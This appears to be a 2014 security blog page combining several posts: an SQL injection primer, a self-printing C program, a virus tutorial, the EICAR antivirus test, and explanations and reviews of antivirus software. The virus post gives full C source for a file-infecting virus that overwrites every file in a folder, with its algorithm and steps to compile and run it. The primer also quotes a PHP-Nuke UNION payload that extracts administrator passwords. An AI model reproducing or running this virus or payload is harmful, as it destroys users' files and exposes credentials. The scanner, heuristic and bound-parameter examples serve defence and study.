Sunday, 23 November 2014

Introduction to SQL Injection

This article covers the basics of what SQL Injection is and how it works under the hood. Most people act as if they know SQL Injection just because they can use a vulnerability in PHP-Nuke by pasting it into the address bar, and bam, it’s done. An injection is not that easy to discover; once discovered, it’s a lot easier to use, which is what people mostly do: use already discovered SQL Injections.
What is SQL?
SQL stands for Structured Query Language. It has been around for ages and is designed to work with all programming languages; where it does not, there will be an optional function to simulate what SQL can do. The basic function of SQL is to give full control over databases. With SQL you issue what is known as a “statement”, which executes instructions that do things ranging from displaying just the users from a table to adding new users / passwords / descriptions into a table or a DB in general.
Example Scenario:
Let’s say you have an Access Database that contains a table called TblUsers. Each Column contains information on that user, let’s say, it would contain Username, Password, Hash, Email. You want to be able to just show the username and password from the Access DB using SQL Statements. You would do the following:
SELECT Username,Password FROM TblUsers
This would specifically “select” the Username and Password (always separated by the delimiter “,”) “from” the table you wish to pull the information from, which was TblUsers. Then, you would simply execute your SQL statement and have it dump to whatever you are displaying the information in (listview, text file, html file etc.).
So, as you can see, SQL is very handy. That’s just a simple example of what it’s used for. You can also use basic commands like INSERT, which allows you to insert information into columns. This is where a lot of the vulnerabilities come into play with SQL Injection.
What is SQL Injection? (Example based off PHP scripts)
SQL Injection is a method of injecting data into a remote table or other sorts of databases that are managed by SQL statements. It is not just limited to injecting information. You can also use it to pull back and display valuable information, even using the common statements above, given the correct scenario. A lot of times, SQL Injection is as simple as re-arranging a PHP script’s POST information and adding things like “admin=1” etc., which normally would be a hidden function only used when creating administrators.
A lot of the web logins that you see, which have a section for entering a Username / Password, run an SQL statement to verify and validate that you are truly a registered user in the database. You could inject SQL commands into the query by sending your own crafted username and password. The limits are endless to the types of information you could be injecting. Let’s look at some prime examples of vulnerabilities in PHP Nuke (they will be outdated, but you will get the idea).
modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--
Let’s examine this old vulnerability. First you see the basic PHP script, which is the prime target of a lot of attacks. They requested a basic page, but after the &cid=2 they appended an SQL statement; if the script is not coded to deny SQL statements, you can use almost any query on the vulnerable script.
Now, you see that they ran UNION select counter, aid, pwd FROM nuke_authors --
UNION is a common statement that allows you to execute two SQL queries together and dump the information all into the same output. After that they use the basic SELECT example that I showed you, but notice the “--”? This is a common method used to bypass login credentials. “--” starts an SQL comment, so the database ignores whatever is left of the script’s original query after the injected text, and with it any errors that the leftover text would otherwise cause.
So, the output would dump the information from the columns onto the web site.
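The query described above, next to its fix, as an added example that is not code from the original article or from PHP-Nuke. It uses Python with an in-memory SQLite database instead of PHP; the `downloads` table, its `active` column and all rows are constructed for illustration, while `nuke_authors` and its columns are the ones named in the URL.

```python
import sqlite3

# The article's URL parameter after URL-decoding ("--" is the SQL comment marker).
PAYLOAD = "2 UNION select counter, aid, pwd FROM nuke_authors --"


def make_db():
    """In-memory database with constructed rows. nuke_authors and its columns
    come from the article; the downloads table is hypothetical."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE downloads (lid INTEGER, title TEXT, url TEXT,
                                cid INTEGER, active INTEGER);
        CREATE TABLE nuke_authors (counter INTEGER, aid TEXT, pwd TEXT);
        INSERT INTO downloads VALUES (1, 'Manual', '/files/manual.pdf', 2, 1);
        INSERT INTO downloads VALUES (2, 'Draft', '/files/draft.pdf', 2, 0);
        INSERT INTO nuke_authors VALUES (0, 'admin', 'constructed-hash');
    """)
    return db


def view_downloads_vulnerable(db, cid):
    """The flaw: the request parameter becomes part of the SQL text."""
    sql = "SELECT lid, title, url FROM downloads WHERE cid=" + cid + " AND active=1"
    return db.execute(sql).fetchall()


def view_downloads_bound(db, cid):
    """The fix: constant SQL text, with cid passed as a bound value."""
    sql = "SELECT lid, title, url FROM downloads WHERE cid=? AND active=1"
    return db.execute(sql, (cid,)).fetchall()


def demo():
    db = make_db()
    results = {
        "normal": view_downloads_vulnerable(db, "2"),
        # UNION appends the author rows; "--" also drops "AND active=1".
        "injected": view_downloads_vulnerable(db, PAYLOAD),
        # Bound, the whole payload is compared to cid as one value: no match.
        "bound_payload": view_downloads_bound(db, PAYLOAD),
        "bound_normal": view_downloads_bound(db, "2"),
    }
    try:
        # Without "--" the leftover "AND active=1" is a syntax error.
        view_downloads_vulnerable(db, PAYLOAD.replace("--", ""))
        results["without_comment"] = "ran"
    except sqlite3.OperationalError as exc:
        results["without_comment"] = "error: %s" % exc
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

With a bound parameter the database never parses the request value as SQL, so no filtering of keywords such as UNION is needed.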

Conclusion
If you want to test your own creations for SQL Injection, I recommend getting an SQL book or file that has all of the possible SQL statements and attacking your own modules with common statements. I just gave you the foundation; now you must take the next step and learn on your own. If you want a more in-depth set of examples, which would teach you a lot more than I did, check out SecurityFocus Article.
This article is not huge, but it should give you a basic understanding of SQL Injection and SQL in general. This way, when you hear someone bragging about how they attacked a site with SQL Injection and all they can show you is what they injected, but not how they got that information, you know right away the truth about them.

C Program to Print its Own Source Code

Ever wondered how to write a C program to print its own source code? Well, here is the source code of a C program that, when executed, will print its own source code. In other words, the output of this program is exactly the same as its source code.

Here’s the program:

#include<stdio.h>

char *program="#include<stdio.h>%cchar *program=%c%s%c;%cvoid main()%c{%cprintf(program,10,34,program,34,10, 10,10,10);%c}";

void main()
{
printf(program,10,34,program,34,10,10,10,10);
}


How to Create a Computer Virus?

This program is an example of how to create a computer virus in C language. This program demonstrates a simple virus program which when executed creates a copy of itself in all the other files that are present in the same directory.

Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on.

Here’s the source code of the virus program:
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>


FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

This virus is designed to infect all types of files with any extension.

How the Virus Program Works?

The algorithm of this virus program is as follows:

Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file).

Step-2: Load the copy of the virus itself onto the memory.

Step-3: Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.

Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit.

As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.
How to Compile the Program:

For a step-by-step guide, you can refer to my detailed post on how to compile C programs.
How to Test the Virus After the Compilation:

Create a new empty folder.

Put some executable files (or any other files) in the folder.

Run the PC_Virus.exe file. Within a few seconds, all the other files in the folder get infected.

Now every infected file is a new virus which is ready to re-infect. You can copy any of the infected .exe file to another empty folder and repeat the same procedure to see if the infected file is capable of re-infecting. Delete the folder and all the infected files after the testing process is done.

NOTE: The files infected by this virus are destroyed completely and cannot be recovered. So, always test the virus in a new folder by placing some sample files.

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE.


How to Test the Working of Your Antivirus: EICAR Test

Have you ever wondered how to test your antivirus software so as to ensure that it is working properly? Well, here is a quick and easy way to safely test your antivirus without having to deal with a real virus. The process is called the EICAR test. This test is designed to work on any antivirus software and was developed by the European Institute of Computer Antivirus Research.

This process can be used by people, companies and antivirus programmers to test the proper functioning of the antivirus/antimalware software without having to deal with the real computer virus which can cause damage to the computer.
How to Test Your Antivirus?

Here is a step-by-step procedure to test your antivirus functionality:

Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.
EICAR Test code
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Rename the file from “New Text Document.TXT” to “virus-sample.com”.

Now run the antivirus scan on this “virus-sample.com” file.

If the antivirus is working properly on your computer, then it should generate a warning message and immediately delete the file upon scanning. Otherwise, you may have to re-install your antivirus.
NOTE: Most antivirus software (with an auto-detect feature) will pop up a warning message at Step-1 itself.

You can also place the “virus-sample.com” file in a ZIP or RAR file and run a scan on it so as to ensure that your antivirus can detect the test string even in the compressed archive. Any antivirus while scanning this file should respond exactly as it will do for a genuine virus/malicious code.

This test will cause no damage to your computer even though the antivirus will flag it as a malicious script. Hence, it is the safest method to test the proper functioning of any antivirus software.
How EICAR Antivirus Test Works?

During the development of the antivirus software, the AV programmers flag the EICAR test code/string as a verified virus. This is a standard adopted by every antivirus company so as to make the testing process simple and risk-free. Therefore, every antivirus will respond to EICAR string in the same way it does for a genuine malicious code.

How Antivirus Software Works

Due to the ever-increasing threat from viruses and other malicious programs, almost every computer today comes with antivirus software pre-installed on it. In fact, an antivirus has become one of the most essential software packages for every computer.

Even though every one of us has antivirus software installed on our computers, only a few really bother to understand how it actually works! Well, if you are one among those few who would really bother to understand how antivirus works, then this article is for you.
How Antivirus Works:

An antivirus software typically uses a variety of strategies in detecting and removing viruses, worms and other malware programs. The following are the two most widely employed identification methods:
1. Signature-based detection (Dictionary approach)

This is the most commonly employed method which involves searching for known patterns of virus within a given file. Every antivirus software will have a dictionary of sample malware codes called signatures in its database. Whenever a file is examined, the antivirus refers to the dictionary of sample codes present within its database and compares the same with the current file. If the piece of code within the file matches with the one in its dictionary then it is flagged and proper action is taken immediately so as to stop the virus from further replicating. The antivirus may choose to repair the file, quarantine or delete it permanently based on its potential risk.

As new viruses and malware are created and released every day, this method of detection cannot defend against new malware unless samples are collected and signatures are released by the antivirus software company. Some companies may also encourage users to upload new viruses or variants so that the virus can be analyzed and the signature can be added to the dictionary.

Signature based detection can be very effective, but requires frequent updates of the virus signature dictionary. Hence, the users must update their antivirus software on a regular basis so as to defend against new threats that are released daily.
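A small signature scanner that ties the dictionary approach to the EICAR test, including the ZIP case from the EICAR article. This is an added example, not code from any antivirus product: the signature names, the size and depth limits and the sample files are constructed, and only the EICAR string comes from the page.

```python
import io
import zipfile

# The 68-byte EICAR test string from the article, written in two pieces so an
# on-access scanner does not quarantine this source file.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-" + rb"ANTIVIRUS-TEST-FILE!$H+H*"

# Signature dictionary: name -> byte pattern. The second entry is constructed.
SIGNATURES = {
    "EICAR-Test-File": EICAR,
    "Constructed-Sample": b"CONSTRUCTED-SAMPLE-SIGNATURE",
}

MAX_DEPTH = 3                 # assumed limit on nested archives
MAX_MEMBER_BYTES = 1 << 20    # assumed cap, skips oversized (zip-bomb) members


def scan(name, data, depth=0):
    """Return (path, signature name) pairs for every dictionary match.

    The raw bytes are searched first. A deflated archive member is generally
    not present byte-for-byte in the archive, so ZIP files are also opened
    and each member is scanned in turn.
    """
    hits = [(name, sig) for sig, pattern in SIGNATURES.items() if pattern in data]
    if depth < MAX_DEPTH and zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            for info in archive.infolist():
                member_path = name + "!" + info.filename
                if info.is_dir() or info.file_size > MAX_MEMBER_BYTES:
                    continue
                if info.flag_bits & 0x1:
                    # Encrypted members cannot be inspected; report, don't skip silently.
                    hits.append((member_path, "encrypted-not-scanned"))
                    continue
                hits += scan(member_path, archive.read(info), depth + 1)
    return hits


def build_zip(members):
    """Build a deflate-compressed ZIP in memory from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        for member_name, content in members.items():
            archive.writestr(member_name, content)
    return buf.getvalue()


def demo():
    """Scan three constructed files: the test file, a clean file and a ZIP."""
    archive = build_zip({"virus-sample.com": EICAR, "readme.txt": b"nothing here"})
    files = {
        "virus-sample.com": EICAR,
        "notes.txt": b"plain text",
        "sample.zip": archive,
    }
    hits = []
    for name, data in files.items():
        hits += scan(name, data)
    return hits


if __name__ == "__main__":
    for path, signature in demo():
        print(path, "->", signature)
```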
2. Heuristic-based detection (Suspicious behaviour approach)

Heuristic-based detection involves identifying suspicious behaviour from any given program which might indicate a potential risk. This approach is used by some of the sophisticated antivirus software to identify new malware and variants of known malware.

Unlike the signature based approach, here the antivirus doesn’t attempt to identify known viruses, but instead monitors the behavior of all programs.

For example, malicious behaviours like a program trying to write data to an executable program is flagged and the user is alerted about this action. This method of detection gives an additional level of security from unidentified threats.

File emulation: This is another type of heuristic-based approach where a given program is executed in a virtual environment and the actions performed by it are logged. Based on the actions logged, the antivirus software can determine if the program is malicious or not and carry out necessary actions in order to clean the infection.
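A sketch of the behaviour rule described above (a program writing to executable files), applied to a logged list of actions. This is an added example and not how any particular product works: the log format, paths, thresholds and the trusted list are constructed, and PC_Virus.exe is only the file name used elsewhere on this page.

```python
import re
from collections import defaultdict

EXECUTABLE_EXTENSIONS = (".exe", ".com", ".dll", ".scr")

# Constructed log format: one action per line.
LINE = re.compile(
    r"pid=(?P<pid>\d+) image=(?P<image>\S+) "
    r"action=(?P<action>\w+) target=(?P<target>\S+)"
)

# Constructed behaviour log, as an emulator or monitor might record it.
SAMPLE_LOG = r"""
pid=412 image=C:\test\PC_Virus.exe action=read target=C:\test\PC_Virus.exe
pid=412 image=C:\test\PC_Virus.exe action=write target=C:\test\calc.exe
pid=412 image=C:\test\PC_Virus.exe action=write target=C:\test\notes.txt
pid=412 image=C:\test\PC_Virus.exe action=write target=C:\test\tool.com
pid=520 image=C:\apps\editor.exe action=write target=C:\docs\report.txt
pid=633 image=C:\apps\updater.exe action=write target=C:\apps\editor.exe
"""


def evaluate(log_text, trusted=frozenset(), block_threshold=2):
    """Return {pid: (verdict, executables written)} for suspicious processes.

    One write to an executable raises an alert; writes to block_threshold or
    more distinct executables are blocked. Images listed in `trusted`
    (lower-case paths) are allowed, since installers and updaters write
    executables legitimately.
    """
    written = defaultdict(set)   # pid -> distinct executable targets written
    images = {}                  # pid -> image path of the writing process
    for line in log_text.splitlines():
        match = LINE.fullmatch(line.strip())
        if not match or match["action"] != "write":
            continue
        target = match["target"].lower()
        if target.endswith(EXECUTABLE_EXTENSIONS):
            pid = int(match["pid"])
            written[pid].add(target)
            images[pid] = match["image"].lower()

    verdicts = {}
    for pid, targets in written.items():
        if images[pid] in trusted:
            verdict = "allowed"
        elif len(targets) >= block_threshold:
            verdict = "block"
        else:
            verdict = "alert"
        verdicts[pid] = (verdict, sorted(targets))
    return verdicts


if __name__ == "__main__":
    for pid, (verdict, targets) in evaluate(SAMPLE_LOG).items():
        print(pid, verdict, targets)
```

The updater line shows why heuristics produce false positives: without the trusted list, a legitimate update is flagged the same way as the first step of an infection.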

Most commercial antivirus software use a combination of both signature-based and heuristic-based approaches to combat malware.
Issues of Concern:

Zero-day threats: A zero-day (zero-hour) threat or attack is where malware tries to exploit computer application vulnerabilities that are not yet identified by the antivirus software companies. These attacks are used to cause damage to the computer even before they are identified. Since patches are not yet released for these kinds of new threats, they can easily manage to bypass the antivirus software and carry out malicious actions. Most of the threats are identified after a day or two of their release, but the damage caused by them before identification is quite inevitable.

Daily Updates: Since new viruses and threats are released every day, it is most essential to update the antivirus software so that the virus definitions are kept up-to-date. Most software will have an auto-update feature so that, the virus definitions are updated whenever the computer is connected to the Internet.

Effectiveness: Even though an antivirus software can catch almost every malware, it is still not 100% foolproof against all kinds of threats. As explained earlier, a zero-day threat can easily bypass the protective shield of the antivirus software. Also virus authors have tried to stay a step ahead by writing “oligomorphic”, “polymorphic” and, more recently, “metamorphic” virus codes, which will encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match virus signatures in the dictionary.

Thus user awareness is as important as antivirus software; users must be trained to practice safe surfing habits such as downloading files only from trusted websites and not blindly executing a program that is unknown or obtained from an untrusted source. I hope this article has helped you understand the working of an antivirus software.

List of Killer Antivirus Software for Windows 8

Windows 8 is considered as one of the special creations of Microsoft, as it carries a number of interesting features in it which the predecessors fail to carry. One of the important features includes the robust security system inbuilt in it in the form of Windows Defender, which gives better security to your computer while using the same. However, if you compare it with some of the modern and killer antivirus programs it seems to be lagging behind in many ways. Hence as per experts, it is always a safer and better option to install one of the effective antivirus software over your Windows 8 based system. Some of the killer antivirus software applications are as under for Windows 8 operating system, let’s check them out:


Bitdefender Antivirus

One of the best and popular antivirus software for the Windows 8 based computer is Bitdefender antivirus. Some of the important features include finding out and deleting the viruses creating spaces. Also, it is smart enough to catch different malware programs, which is also the reason why it is a popular option for the Windows 8 based users. This antivirus program also helps in shielding against identity theft or even financial information theft; thanks to its important feature called the Safepay function. Considering a number of features and important pros in it, Bitdefender antivirus has been awarded as the editor’s choice in 2012 from PC Magazine.
The Pros:

As far as the pros are concerned there are many noticeable sides of Bitdefender antivirus. It has high scores in PC magazine’s antivirus tests along with having a nice score too at several independent lab tests. It is good in phishing protection; it also prevents infection transmission to several private data and keeps a check over ID theft. The feature called New Wallet simply manages passwords and private data. The Safepay function in this software protects all your financial transactions, which means you can enjoy a safe and secured kind of online shopping. In case if you visit any suspicious website, it is the first to warn you. Also, this antivirus has a feature called secure gamer mode, 24×7 support and the free of cost credit monitoring service option which play their part in securing your Windows 8 based machines. Lastly, even your social media profiles are secured as it keeps a check over the different vulnerabilities.
The Cons:

Despite the number of pros, Bitdefender antivirus has few cons as well. At times, you may find some issues while installing the same over the malware infested computers. Also, the Wallet Password Management at times cannot fill the web forms. Lastly, once you install it over the Windows 8 based systems it reduces your PC speed owing to the robust scanning steps carried by it.
Kaspersky Antivirus

Kaspersky antivirus software is considered as the backbone of any computer security system and hence is also counted for the Windows 8 based security system. It works behind the scene to deliver some of the most reliable and quickest virus and spyware protection solutions. It is also known to offer the Windows 8 users better malware protection thus securing all your personal and classified info in various ways. Kaspersky antivirus also scans different sites, files, emails, discs, external drives, the apps and chat content to flush out the malicious stuff from these places. You also come across the cloud based and software based protection element, which allow you to offer a robust kind of security regardless of the fact that your system is hooked to the Internet or not. Another appreciating feature is the smart updates, which does a lot of things by consuming less than 1% of your computer resources. Also, you have the option of customizing the several notifications along with configuring the same.
The Pros:

As far as the pros are concerned, it has achieved some of the best results in security software tests. The product comes with three licenses and, lastly, makes it easy to create a bootable recovery disk. Its interface is designed in a very user-friendly way, and it is simple and hassle free to install on your Windows 8 computer. The feature called Kaspersky Security Network helps in identifying the new threats you encounter on your Windows 8 based systems. You get quick scan times along with good value. Lastly, it also helps in getting protection against a number of exploits for several insecure settings.
The Cons:

Apart from the pros, it also has a few cons to mention. First of all, it is quite costly (40 dollars), and secondly, it does not contain any firewall. Also, if you are carrying out special or multiple kinds of scans, the entire process becomes slow and time consuming.
Final Word

In a short span of time, Windows 8 has achieved a good amount of popularity among the users. This is because it has a wide range of features, which the earlier versions failed to have. However, to continue using this OS with ease and comfort you need to secure it with reliable antivirus software. The above are two best and killer kind of antivirus software for Windows 8 based PC users.
About the Author

Brianne Walter is a freelance journalist who has been writing about mobile technology, customer relationship management and women’s health for more than a decade. These days she is busy contributing on amplify.
